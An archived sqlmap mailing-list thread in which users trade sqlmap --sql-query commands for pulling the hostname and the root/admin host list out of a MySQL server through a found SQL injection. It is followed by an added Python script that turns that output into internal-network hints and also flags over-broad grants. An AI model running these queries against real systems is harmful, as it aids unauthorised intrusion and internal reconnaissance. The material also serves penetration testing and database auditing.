Thread: [sqlmap-users] SQL Query To Retrieve MySQL Server IP Address
From: Zaki A. <zak...@gm...> - 2012-11-28 08:32:07

Hello,

I found an SQL injection vulnerability. I want to know the database server IP address. From the fingerprint result, the database server is MySQL. How should I write the --sql-query so that I could retrieve the MySQL database server IP address? It's an n-tier web application.

$ python sqlmap.py -u something --sql-query=""

Just an idea: maybe it's possible to add a built-in SQL query function to retrieve the database server IP address whatever database is used (or am I the one who didn't know it?)

Thanks,
--
Zaki Akhmad
From: Leon J. <leo...@gm...> - 2012-11-28 08:39:56

On Wed, Nov 28, 2012 at 10:31 AM, Zaki Akhmad <zak...@gm...> wrote:
> Hello,
>
> I found an SQL injection vulnerability. I want to know the database
> server IP address. From the fingerprint result, the database server is
> MySQL. How should I write the --sql-query so that I could retrieve the
> MySQL database server IP address? It's an n-tier web application.
>
> $ python sqlmap.py -u something --sql-query=""
>
> Just an idea: maybe it's possible to add a built-in SQL query function
> to retrieve the database server IP address whatever database is used
> (or am I the one who didn't know it?)
>
> Thanks,

If it's MySQL and according to [1], try:

$ python sqlmap.py -u something --sql-query="show variables where Variable_name = 'hostname'"

I am not 100% sure about the required permissions/escaping that might be needed to achieve this via your injection point though...

--
Regards
Leon Jacobs

Sent using electronic mail ツ

[1] http://dev.mysql.com/doc/refman/5.1/en/show-variables.html
From: Zaki A. <zak...@gm...> - 2012-11-28 08:45:58

On Wed, Nov 28, 2012 at 3:39 PM, Leon Jacobs <leo...@gm...> wrote:
> If it's MySQL and according to [1], try:
>
> $ python sqlmap.py -u something --sql-query="show variables where
> Variable_name = 'hostname'"
>
> I am not 100% sure about the required permissions/escaping that might be
> needed to achieve this via your injection point though...

Here's the result: Is it not possible from the injection point? Or is there any other sql-query?

back-end DBMS: MySQL 5.0
[15:43:37] [INFO] fetching SQL SELECT statement query output: 'show variables where Variable_name = 'hostname''
[15:43:37] [WARNING] reflective value(s) found and filtering out
[15:43:37] [INFO] resumed: None
show variables where Variable_name = 'hostname': 'None'

--
Zaki Akhmad
From: Miroslav S. <mir...@gm...> - 2012-11-28 08:48:44

That proposed solution is equivalent to SELECT @@hostname (except that the last one doesn't need that non-query SHOW statement). The only thing is that you'll get the same result as with --hostname, which is not the IP address that you require. Have to seek what can be used here.

Kind regards

On Wed, Nov 28, 2012 at 9:39 AM, Leon Jacobs <leo...@gm...> wrote:
> On Wed, Nov 28, 2012 at 10:31 AM, Zaki Akhmad <zak...@gm...> wrote:
>
>> Hello,
>>
>> I found an SQL injection vulnerability. I want to know the database
>> server IP address. From the fingerprint result, the database server is
>> MySQL. How should I write the --sql-query so that I could retrieve the
>> MySQL database server IP address? It's an n-tier web application.
>>
>> $ python sqlmap.py -u something --sql-query=""
>>
>> Just an idea: maybe it's possible to add a built-in SQL query function
>> to retrieve the database server IP address whatever database is used
>> (or am I the one who didn't know it?)
>>
>> Thanks,
>
> If it's MySQL and according to [1], try:
>
> $ python sqlmap.py -u something --sql-query="show variables where
> Variable_name = 'hostname'"
>
> I am not 100% sure about the required permissions/escaping that might be
> needed to achieve this via your injection point though...
>
> --
> Regards
> Leon Jacobs
>
> Sent using electronic mail ツ
>
> [1] http://dev.mysql.com/doc/refman/5.1/en/show-variables.html
>
> ------------------------------------------------------------------------------
> Keep yourself connected to Go Parallel:
> INSIGHTS What's next for parallel hardware, programming and related areas?
> Interviews and blogs by thought leaders keep you ahead of the curve.
> http://goparallel.sourceforge.net
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
From: Leon J. <leo...@gm...> - 2012-11-28 08:53:32

On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar <mir...@gm...> wrote:
> That proposed solution is equivalent to SELECT @@hostname (except that the
> last one doesn't need that non-query SHOW statement). The only thing is that
> you'll get the same result as with --hostname, which is not the IP address that
> you require. Have to seek what can be used here.

Yeah, this is perfect. And then hopefully getting the IP is as simple as looking up the hostname, assuming it resolves, but that is not guaranteed. =p

--
Regards
Leon Jacobs

Sent using electronic mail ツ
From: Zaki A. <zak...@gm...> - 2012-11-28 08:56:00

On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote:
> On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar
> <mir...@gm...> wrote:
>>
>> That proposed solution is equivalent to SELECT @@hostname (except that the
>> last one doesn't need that non-query SHOW statement). The only thing is that
>> you'll get the same result as with --hostname, which is not the IP address that
>> you require. Have to seek what can be used here.
>
>
> Yeah, this is perfect. And then hopefully getting the IP is as simple as
> looking up the hostname, assuming it resolves, but that is not guaranteed. =p

The --sql-query="select @@hostname" works :-)

--
Zaki Akhmad
From: Miroslav S. <mir...@gm...> - 2012-11-28 09:04:38

Hi.

If you want to get IP addresses of interest you could try something like this:

--sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'"

back-end DBMS: MySQL >= 5.0.0
[10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%''
SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%' [6]:
[*] 127.0.0.1, root
[*] 172.16.162.1, root
[*] 192.168.21.1, root
[*] debian-5.0-i386, root
[*] localhost, root

Kind regards,
Miroslav Stampar

On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...> wrote:
> On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote:
> > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar
> > <mir...@gm...> wrote:
> >>
> >> That proposed solution is equivalent to SELECT @@hostname (except that the
> >> last one doesn't need that non-query SHOW statement). The only thing is that
> >> you'll get the same result as with --hostname, which is not the IP address that
> >> you require. Have to seek what can be used here.
> >
> >
> > Yeah, this is perfect. And then hopefully getting the IP is as simple as
> > looking up the hostname, assuming it resolves, but that is not guaranteed. =p
>
> The --sql-query="select @@hostname" works :-)
>
> --
> Zaki Akhmad

--
Miroslav Stampar
http://about.me/stamparm
From: Zaki A. <zak...@gm...> - 2012-11-28 09:15:06

On Wed, Nov 28, 2012 at 4:04 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> If you want to get IP addresses of interest you could try something like
> this:
> --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR
> user LIKE '%admin%'"
>
> back-end DBMS: MySQL >= 5.0.0
> [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT host,
> user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%''
> SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE
> '%admin%' [6]:
> [*] 127.0.0.1, root
> [*] 172.16.162.1, root
> [*] 192.168.21.1, root
> [*] debian-5.0-i386, root
> [*] localhost, root

Thanks a lot, Miroslav.

--
Zaki Akhmad
From: Stephen S. <ss...@ss...> - 2012-11-28 09:12:43

Don't all these current methods rely on either the hostname of the MySQL server being something that actually resolves, or an authentication rule using a public IP? If a server is NAT'd, won't both of these fail?

Could a more reliable way of getting the IP/hostname be to make a DNS request or similar? That way you'll get the public IP as long as it can make an outgoing connection (which seems more likely on average than having a rule for authenticating users with it, or having the hostname be resolvable).

Maybe sqlmap could try a combination of these for an improved hostname lookup? Or is this more work for an edge case (or possibly what I said above is wrong and one of the other methods will consistently work).

On Wed, Nov 28, 2012 at 10:04 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> If you want to get IP addresses of interest you could try something like
> this:
> --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR
> user LIKE '%admin%'"
>
> back-end DBMS: MySQL >= 5.0.0
> [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT
> host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%''
> SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE
> '%admin%' [6]:
> [*] 127.0.0.1, root
> [*] 172.16.162.1, root
> [*] 192.168.21.1, root
> [*] debian-5.0-i386, root
> [*] localhost, root
>
> Kind regards,
> Miroslav Stampar
>
>
> On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...> wrote:
>
>> On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote:
>> > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar
>> > <mir...@gm...> wrote:
>> >>
>> >> That proposed solution is equivalent to SELECT @@hostname (except that the
>> >> last one doesn't need that non-query SHOW statement). The only thing is that
>> >> you'll get the same result as with --hostname, which is not the IP address that
>> >> you require. Have to seek what can be used here.
>> >
>> >
>> > Yeah, this is perfect. And then hopefully getting the IP is as simple as
>> > looking up the hostname, assuming it resolves, but that is not guaranteed. =p
>>
>> The --sql-query="select @@hostname" works :-)
>>
>> --
>> Zaki Akhmad
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-11-28 09:25:33

On Wed, Nov 28, 2012 at 10:12 AM, Stephen Shkardoon <ss...@ss...> wrote:
> Don't all these current methods rely on either the hostname of the MySQL
> server being something that actually resolves, or an authentication rule
> using a public IP? If a server is NAT'd, won't both of these fail?
>
> Could a more reliable way of getting the IP/hostname be to make a DNS request
> or similar? That way you'll get the public IP as long as it can make an
> outgoing connection (which seems more likely on average than having a rule
> for authenticating users with it, or having the hostname be resolvable).
>
> Maybe sqlmap could try a combination of these for an improved hostname
> lookup? Or is this more work for an edge case (or possibly what I said above
> is wrong and one of the other methods will consistently work).

More work than benefit(s). We won't extend this any further than the --hostname switch itself.

I just wrote that last method as it could give you a list of IP addresses from where root/admin can connect. The thing is that database administrators tend to put all sorts of IP addresses there, and a wild guess is that you'll get some interesting ones (the hostname itself, IP addresses coming from a local network, ...).

> On Wed, Nov 28, 2012 at 10:04 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> If you want to get IP addresses of interest you could try something like
>> this:
>> --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%'
>> OR user LIKE '%admin%'"
>>
>> back-end DBMS: MySQL >= 5.0.0
>> [10:00:24] [INFO] fetching SQL SELECT statement query output: 'SELECT
>> host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%''
>> SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE
>> '%admin%' [6]:
>> [*] 127.0.0.1, root
>> [*] 172.16.162.1, root
>> [*] 192.168.21.1, root
>> [*] debian-5.0-i386, root
>> [*] localhost, root
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Wed, Nov 28, 2012 at 9:55 AM, Zaki Akhmad <zak...@gm...> wrote:
>>
>>> On Wed, Nov 28, 2012 at 3:53 PM, Leon Jacobs <leo...@gm...> wrote:
>>> > On Wed, Nov 28, 2012 at 10:48 AM, Miroslav Stampar
>>> > <mir...@gm...> wrote:
>>> >>
>>> >> That proposed solution is equivalent to SELECT @@hostname (except that the
>>> >> last one doesn't need that non-query SHOW statement). The only thing is that
>>> >> you'll get the same result as with --hostname, which is not the IP address that
>>> >> you require. Have to seek what can be used here.
>>> >
>>> >
>>> > Yeah, this is perfect. And then hopefully getting the IP is as simple as
>>> > looking up the hostname, assuming it resolves, but that is not guaranteed. =p
>>>
>>> The --sql-query="select @@hostname" works :-)
>>>
>>> --
>>> Zaki Akhmad
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
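The following Python script is an added example, not code from the thread or from sqlmap itself. It takes the "[*] host, user" lines that sqlmap printed for the mysql.user query in Miroslav's 09:04 message and sorts the host column the way his 09:25 reply describes: loopback entries, addresses from a local network, plain hostnames. Seen from the DBA's side, the same table is an audit target: a root/admin account reachable from a wildcard host ('%') or from a public address is the grant to review first, so the script flags those. The sample rows are constructed: the five from the thread plus a wildcard row and a placeholder public address (1.2.3.4), both added here. The parse_sqlmap_rows, classify_host, network_hints and over_broad names are this example's own.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample: the five "[*] host, user" lines sqlmap printed in the
# thread, plus two rows added for this example (a wildcard host and a
# placeholder public address). Not real output from any server.
SAMPLE_OUTPUT = """\
[*] 127.0.0.1, root
[*] 172.16.162.1, root
[*] 192.168.21.1, root
[*] debian-5.0-i386, root
[*] localhost, root
[*] %, admin
[*] 1.2.3.4, root
"""

# sqlmap prints each row of a multi-column query as "[*] col1, col2".
ROW_RE = re.compile(r"^\[\*\]\s*(?P<host>[^,]+),\s*(?P<user>\S+)\s*$")


@dataclass(frozen=True)
class Grant:
    host: str
    user: str
    kind: str        # loopback / private / public / wildcard / hostname
    over_broad: bool  # True when the host part should be reviewed


def classify_host(host):
    """Categorise one mysql.user host entry."""
    if host == "localhost":
        return "loopback"
    # '%' and '_' are LIKE-style wildcards in the MySQL host column.
    if "%" in host or "_" in host:
        return "wildcard"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"        # not an IP literal, e.g. debian-5.0-i386
    if addr.is_loopback:
        return "loopback"
    if addr.is_private:
        return "private"         # RFC 1918 and similar non-global ranges
    return "public"


def parse_sqlmap_rows(text):
    """Parse sqlmap's '[*] host, user' lines into Grant records."""
    grants = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue             # skip the banner/progress lines
        host, user = m.group("host").strip(), m.group("user")
        kind = classify_host(host)
        grants.append(Grant(host, user, kind, kind in ("wildcard", "public")))
    return grants


def network_hints(grants):
    """Distinct /24 networks implied by the private addresses in the host column."""
    nets = {str(ipaddress.ip_network(f"{g.host}/24", strict=False))
            for g in grants if g.kind == "private"}
    return sorted(nets)


def over_broad(grants):
    """(host, user) pairs whose host part is a wildcard or a public address."""
    return [(g.host, g.user) for g in grants if g.over_broad]


if __name__ == "__main__":
    rows = parse_sqlmap_rows(SAMPLE_OUTPUT)
    for g in rows:
        flag = "  <-- review grant" if g.over_broad else ""
        print(f"{g.user:<8} {g.host:<18} {g.kind}{flag}")
    print("local networks seen:", network_hints(rows))
```

The "hostname" and "loopback" categories are what the thread's other answers (@@hostname, SHOW VARIABLES) give you anyway; the "private" rows are the part Miroslav points at, since they name networks the database trusts. On the defending side, the over_broad list is the quick check to run against a dump of mysql.user after a GRANT change.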